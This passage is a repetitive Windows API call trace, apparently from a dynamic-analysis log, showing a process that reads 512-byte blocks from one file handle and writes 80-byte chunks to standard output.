lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.672] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.672] GetFileType (hFile=0x50) returned 0x1 [0227.672] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.672] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.672] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.672] GetFileType (hFile=0x50) returned 0x1 [0227.672] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.672] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.672] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.672] GetFileType (hFile=0x50) returned 0x1 [0227.672] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.672] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.672] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.672] GetFileType (hFile=0x50) returned 0x1 [0227.672] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.672] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.673] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.673] GetFileType (hFile=0x50) returned 0x1 [0227.673] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.673] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.673] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.673] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.673] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.673] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.673] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.673] GetFileType (hFile=0x50) returned 0x1 [0227.673] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.673] GetFileType (hFile=0x50) returned 0x1 [0227.673] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.673] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.673] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.673] GetFileType (hFile=0x50) returned 0x1 [0227.673] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.673] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.673] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.673] GetFileType (hFile=0x50) returned 0x1 [0227.673] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.673] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.674] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.674] GetFileType (hFile=0x50) returned 0x1 [0227.674] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.674] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.674] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.674] GetFileType (hFile=0x50) returned 0x1 [0227.674] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.674] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.674] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.674] GetFileType (hFile=0x50) returned 0x1 [0227.674] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.674] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.674] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.674] GetFileType (hFile=0x50) returned 0x1 [0227.674] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.674] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.674] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.674] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.675] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.675] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.675] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.675] GetFileType (hFile=0x50) returned 0x1 [0227.675] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.675] GetFileType (hFile=0x50) returned 0x1 [0227.675] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.675] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.675] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.675] GetFileType (hFile=0x50) returned 0x1 [0227.675] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.675] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.675] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.675] GetFileType (hFile=0x50) returned 0x1 [0227.675] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.675] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.675] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.675] GetFileType (hFile=0x50) returned 0x1 [0227.675] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.675] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.676] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.676] GetFileType (hFile=0x50) returned 0x1 [0227.676] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.676] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.676] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.676] GetFileType (hFile=0x50) returned 0x1 [0227.676] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.676] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.676] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.676] GetFileType (hFile=0x50) returned 0x1 [0227.676] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.676] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.676] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.676] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.676] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.676] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.676] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.676] GetFileType (hFile=0x50) returned 0x1 [0227.676] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.676] GetFileType (hFile=0x50) returned 0x1 [0227.676] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.676] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.677] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.677] GetFileType (hFile=0x50) returned 0x1 [0227.677] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.677] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.677] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.677] GetFileType (hFile=0x50) returned 0x1 [0227.677] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.677] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.677] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.677] GetFileType (hFile=0x50) returned 0x1 [0227.677] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.677] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.677] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.677] GetFileType (hFile=0x50) returned 0x1 [0227.677] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.677] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.677] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.677] GetFileType (hFile=0x50) returned 0x1 [0227.677] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.677] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.678] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.678] GetFileType (hFile=0x50) returned 0x1 [0227.678] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.678] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.678] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.678] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.678] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.678] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.678] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.678] GetFileType (hFile=0x50) returned 0x1 [0227.678] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.678] GetFileType (hFile=0x50) returned 0x1 [0227.678] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.678] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.678] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.678] GetFileType (hFile=0x50) returned 0x1 [0227.678] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.678] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.678] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.678] GetFileType (hFile=0x50) returned 0x1 [0227.678] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.679] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.679] GetFileType (hFile=0x50) returned 0x1 [0227.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.679] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.679] GetFileType (hFile=0x50) returned 0x1 [0227.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.679] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.679] GetFileType (hFile=0x50) returned 0x1 [0227.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.679] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.679] GetFileType (hFile=0x50) returned 0x1 [0227.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.679] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.679] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.679] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.680] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.680] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.680] GetFileType (hFile=0x50) returned 0x1 [0227.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.680] GetFileType (hFile=0x50) returned 0x1 [0227.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.680] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.680] GetFileType (hFile=0x50) returned 0x1 [0227.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.680] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.680] GetFileType (hFile=0x50) returned 0x1 [0227.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.680] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.680] GetFileType (hFile=0x50) returned 0x1 [0227.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.681] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.681] GetFileType (hFile=0x50) returned 0x1 [0227.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.681] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.681] GetFileType (hFile=0x50) returned 0x1 [0227.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.681] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.681] GetFileType (hFile=0x50) returned 0x1 [0227.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.681] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.681] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.681] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.681] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.681] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.681] GetFileType (hFile=0x50) returned 0x1 [0227.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.681] GetFileType (hFile=0x50) returned 0x1 [0227.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.682] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.682] GetFileType (hFile=0x50) returned 0x1 [0227.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.682] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.682] GetFileType (hFile=0x50) returned 0x1 [0227.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.682] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.682] GetFileType (hFile=0x50) returned 0x1 [0227.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.682] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.682] GetFileType (hFile=0x50) returned 0x1 [0227.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.682] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.682] GetFileType (hFile=0x50) returned 0x1 [0227.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.683] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.683] GetFileType (hFile=0x50) returned 0x1 [0227.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.683] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.683] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.683] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.683] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.683] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.683] GetFileType (hFile=0x50) returned 0x1 [0227.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.683] GetFileType (hFile=0x50) returned 0x1 [0227.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.683] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.683] GetFileType (hFile=0x50) returned 0x1 [0227.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.683] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.683] GetFileType (hFile=0x50) returned 0x1 [0227.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.684] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.684] GetFileType (hFile=0x50) returned 0x1 [0227.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.684] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.684] GetFileType (hFile=0x50) returned 0x1 [0227.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.684] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.684] GetFileType (hFile=0x50) returned 0x1 [0227.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.684] 